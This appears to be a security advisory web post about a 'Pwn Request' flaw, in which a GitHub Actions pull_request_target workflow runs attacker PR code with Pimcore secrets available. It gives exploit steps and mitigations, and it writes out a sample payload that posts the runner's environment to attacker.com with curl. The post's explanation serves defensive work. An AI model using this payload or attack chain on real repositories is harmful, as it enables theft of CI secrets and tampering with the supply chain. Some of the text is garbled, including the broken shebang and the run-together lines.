Listen to this Post
The vulnerability arises from the misuse of the `pull_request_target` trigger in a GitHub Actions workflow. This trigger grants the workflow access to base repository secrets and write permissions, but it also allows checking out code from an untrusted pull request head. The workflow in question checks out `ref: ${{ github.event.pull_request.head.ref }}` – the exact branch or commit from the attacker-controlled PR. After checkout, it executes `bin/console` directly from that untrusted source. Because `pull_request_target` runs in the context of the base repository (not the fork), the runner has full access to environment secrets, such as `PIMCORE_SECRET` and PIMCORE_PRODUCT_KEY. An attacker can modify `bin/console` in their fork to include arbitrary bash commands (e.g., whoami, `curl` to exfiltrate secrets). The workflow triggers automatically when a PR is opened against the `5.0` or `next` branch, provided the changed files match the `paths` condition (e.g., `src/dummy.php` or composer.json). This is known as a “Pwn Request” – a specific class of RCE where the CI runner executes malicious PR code in a privileged context. The attacker does not need any repository permissions beyond creating a fork and opening a PR. The output of the malicious script appears in the Actions log (e.g., under “Validate YAML” step), proving code execution. This vulnerability is not a software bug in GitHub Actions but a dangerous misconfiguration. There is no assigned CVE because it’s a pattern, but it is critical if present. The impact includes secret exfiltration, repository tampering, and runner abuse.
dailycve form:
Platform: GitHub Actions
Version: All workflows
Vulnerability: RCE via PR
Severity: Critical
date: 2026-05-14
Prediction: After workflow fix
What Undercode Say:
Simulate malicious bin/console payload echo '!/bin/bash' > bin/console echo 'curl -X POST -d "$(env)" https://attacker.com/exfil' >> bin/console chmod +x bin/console git add bin/console git commit -m "pwn request" git push origin main Open PR against target repo's 5.0 branch
Vulnerable workflow snippet (.github/workflows/static.yml)
on:
pull_request_target:
paths: ['src/dummy.php', 'composer.json']
jobs:
test:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
with:
ref: ${{ github.event.pull_request.head.ref }}
- run: bin/console
Exploit:
1. Fork target repository.
- Modify `bin/console` to contain malicious code (e.g., exfiltration or reverse shell).
- Ensure `src/dummy.php` or `composer.json` is changed to trigger the workflow.
- Open pull request from fork’s branch to base’s `5.0` or
next. - Workflow runs automatically; attacker views logs or receives exfiltrated data.
Protection from this CVE:
- Never check out `head.ref` in `pull_request_target` workflows if executing any code from the checkout.
- Use `pull_request` (unprivileged) for building, then `workflow_run` (privileged) to process artifacts.
- Alternatively, set `actions/checkout` with `persist-credentials: false` and manually handle secrets.
- Review all `pull_request_target` workflows for unsafe `head.ref` usage.
Impact:
- Full RCE on GitHub Actions runner with access to repository secrets (env vars).
- Exfiltration of
PIMCORE_SECRET,PIMCORE_PRODUCT_KEY, andGITHUB_TOKEN. - Potential to modify repository contents if token has write permissions.
- Abuse runner for cryptomining, network scanning, or supply chain attacks.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

